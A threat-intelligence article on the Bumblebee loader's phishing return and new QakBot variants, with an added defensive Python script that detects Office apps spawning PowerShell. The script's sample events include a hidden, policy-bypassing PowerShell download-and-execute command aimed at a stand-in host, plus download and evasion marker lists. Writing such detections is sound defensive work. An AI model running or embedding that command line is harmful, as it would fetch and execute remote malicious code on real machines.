Don’t get stung by the Bumblebee

The infamous malware loader and initial access broker known as Bumblebee has resurfaced after a four-month absence as part of a new phishing campaign observed in February 2024. The enterprise security firm Proofpoint reported that the activity targets organizations in the US with voicemail-themed lures containing links to OneDrive URLs.  "The URLs led to a Word file with names such as 'ReleaseEvans#96.docm' (the digits before the file extension varied)," the company said in a recent report.  "The Word document spoofed the consumer electronics company Humane."  Opening the document leverages VBA macros to launch a PowerShell command to download and execute another PowerShell script from a remote server that, in turn, retrieves and runs the Bumblebee loader.[1]


Bumblebee, first reported in March 2022, is mainly designed to download and execute follow-on payloads such as ransomware.  It has been put to use by multiple crimeware threat actors that were previously observed delivering BazaLoader (aka BazarLoader) and IcedID.  It is also suspected to have been developed by threat actors tied to the Conti and TrickBot cybercrime syndicate as a replacement for BazarLoader.  In September 2023, Intel 471 disclosed a Bumblebee distribution campaign that employed Web Distributed Authoring and Versioning (WebDAV) servers to disseminate the loader.

The attack chain is notable for its reliance on macro-enabled documents, especially considering Microsoft began blocking macros in Office files downloaded from the internet by default in July 2022, prompting threat actors to modify and diversify their approaches.  The macro-based attack is also markedly different from pre-hiatus campaigns, in which the phishing emails came with zipped LNK files bearing Bumblebee executables or HTML attachments that leveraged HTML smuggling to drop a RAR file, which exploited the WinRAR flaw tracked as CVE-2023-38831 to install the loader.
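The chain described above (a Word document whose macro launches PowerShell to fetch a second-stage script) leaves a telemetry trace that defenders can key on: an Office application as the parent of a script host, with download and evasion switches on the command line. The following Python is an added example, not part of the original article or any Proofpoint or Red Sky Alliance tooling. It runs a simple detection over constructed process-creation events in a simplified key="value" form modelled loosely on Sysmon Event ID 1 fields; the hostnames, paths and command lines are invented for the demonstration.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample events (not real telemetry). Each line is a flat set of
# key="value" pairs; values never contain a double quote, so parsing is trivial.
SAMPLE_EVENTS = [
    # Office macro -> hidden PowerShell pulling a remote script: the Bumblebee pattern
    'ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell.exe -w hidden -ep bypass -c IEX (New-Object Net.WebClient)'
    '.DownloadString(\'http://stage.example.invalid/a.ps1\')"',
    # Benign: an admin running PowerShell from Explorer
    'ParentImage="C:\\Windows\\explorer.exe" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell.exe Get-ChildItem C:\\Users"',
    # Suspicious but low-signal: Excel spawning cmd.exe with no download markers
    'ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE" '
    'Image="C:\\Windows\\System32\\cmd.exe" '
    'CommandLine="cmd.exe /c echo macro-test"',
    # Benign: Word spawning the 64-bit print spooler helper
    'ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" '
    'Image="C:\\Windows\\splwow64.exe" '
    'CommandLine="C:\\Windows\\splwow64.exe 12288"',
]

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Substrings (lower-cased) that indicate a second stage is being fetched from the network
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "net.webclient", "invoke-webrequest",
                    "invoke-restmethod", "start-bitstransfer", "http://", "https://")
# Switches commonly used to hide the window or sidestep the execution policy
EVASION_MARKERS = ("-w hidden", "-windowstyle hidden", "-ep bypass", "-executionpolicy bypass",
                   "-enc", "-encodedcommand", "frombase64string")


@dataclass
class Alert:
    severity: str
    parent: str
    child: str
    reasons: List[str] = field(default_factory=list)


def parse_event(line: str) -> dict:
    """Turn one key="value" event line into a dict of field name -> value."""
    return dict(FIELD_RE.findall(line))


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path, independent of the host OS."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event: dict) -> Optional[Alert]:
    """Return an Alert when an Office app spawns a script host; None otherwise."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_APPS or child not in SCRIPT_HOSTS:
        return None
    cmd = event.get("CommandLine", "").lower()
    downloads = [m for m in DOWNLOAD_MARKERS if m in cmd]
    evasions = [m for m in EVASION_MARKERS if m in cmd]
    reasons = [f"{parent} spawned {child}"]
    reasons += [f"download marker: {m}" for m in downloads]
    reasons += [f"evasion marker: {m}" for m in evasions]
    # Any network-fetch marker turns the parent/child relationship into a high-severity hit
    severity = "high" if downloads else "medium"
    return Alert(severity, parent, child, reasons)


def analyze(lines: List[str]) -> List[Alert]:
    """Run the detection over every event line and collect the alerts in order."""
    alerts = []
    for line in lines:
        alert = evaluate(parse_event(line))
        if alert is not None:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(f"[{a.severity.upper()}] {a.parent} -> {a.child}: " + "; ".join(a.reasons))
```

The parent/child pairing alone is the durable signal: command-line markers are easy for an attacker to vary, so the example treats them as severity boosters rather than as the only trigger. In production the same logic maps onto a SIEM query over real Sysmon or EDR process-creation events, with the benign Office child processes seen in your own environment added to an allow-list.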

The return of Bumblebee also coincides with the reappearance of new variants of QakBot, ZLoader, and PikaBot, with samples of QakBot distributed in the form of Microsoft Software Installer (MSI) files.  The MSI drops a Windows .cab (Cabinet) archive containing a DLL.  The MSI extracts the DLL from the .cab and executes it using shellcode.  The shellcode causes the DLL to spawn a second copy of itself and inject the bot code into the second instance's memory space.


The latest QakBot artifacts have been found to harden the encryption used to conceal strings and other information, including employing a crypto-malware called DaveCrypter, making it more challenging to analyze.  The new generation also reinstates the ability to detect whether the malware runs inside a virtual machine or sandbox.

Another crucial modification is the encryption of all communications between the malware and the command-and-control (C2) server using AES-256, a more robust method than was used in versions before the dismantling of QakBot's infrastructure in late August 2023.  The takedown of the QakBot botnet infrastructure was a victory.  Still, the bot's creators remain free, and someone with access to QakBot's source code has been experimenting with new builds and testing the waters with these latest variants.  One of the most notable changes is to the encryption algorithm the bot uses to conceal the default configuration hardcoded into it, making it more difficult for analysts to see how the malware operates; the attackers are also restoring previously deprecated features, such as Virtual Machine (VM) awareness, and testing them out in these new versions.

QakBot has also emerged as the second most prevalent malware for January 2024, trailing behind FakeUpdates (aka SocGholish) but ahead of other families like Formbook, Nanocore, AsyncRAT, Remcos RAT, and Agent Tesla.

The development comes as investigators reported a new campaign in which phishing sites mimicking financial institutions like Barclays trick potential targets into downloading legitimate remote desktop software like AnyDesk, purportedly to resolve non-existent issues, and ultimately allow threat actors to gain control of the machine.


This article is presented at no charge for educational and informational purposes only.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.  Call for assistance.  For questions, comments, a demo, or assistance, please get in touch with the office directly at 1-844-492-7225 or   



